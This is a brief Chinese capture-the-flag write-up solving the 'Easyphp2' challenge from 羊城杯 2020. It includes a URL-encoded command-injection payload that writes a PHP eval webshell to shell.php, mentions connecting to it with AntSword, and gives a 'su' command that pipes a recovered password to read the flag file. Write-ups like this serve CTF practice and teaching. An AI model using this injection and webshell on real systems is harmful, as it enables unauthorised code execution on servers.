# [羊城杯 2020] Easyphp2

1

抓包看看,可以发现有个 pass 变量将他换一下成 GWHT 之后,发现页面改变

2

传递的框框是传在了 count 变量,在下面有回显,可以直接传参写马(记得 url 编码)

'%7C%20echo%20%22%3C%3F%3Deval(%5C%24_POST%5B'shell'%5D)%3F%3E%22%20%3E%20shell.php%20%7C%7C'

有了马直接蚁剑连接(但是不能直接访问 flag.txt):

还有 / GWHT/README 中有 md5 密码解密得:

GWHTCTF

在 / GWHT/system/of/a/down/flag.txt 中

printf "GWHTCTF" | su - GWHT -c 'cat /GWHT/system/of/a/down/flag.txt'

3

获取 flag

参考链接:https://blog.csdn.net/qq_46263951/article/details/119776951

Edited on

Give me a cup of [coffee]~( ̄▽ ̄)~*

odiws WeChat Pay

WeChat Pay

odiws Alipay

Alipay

odiws PayPal

PayPal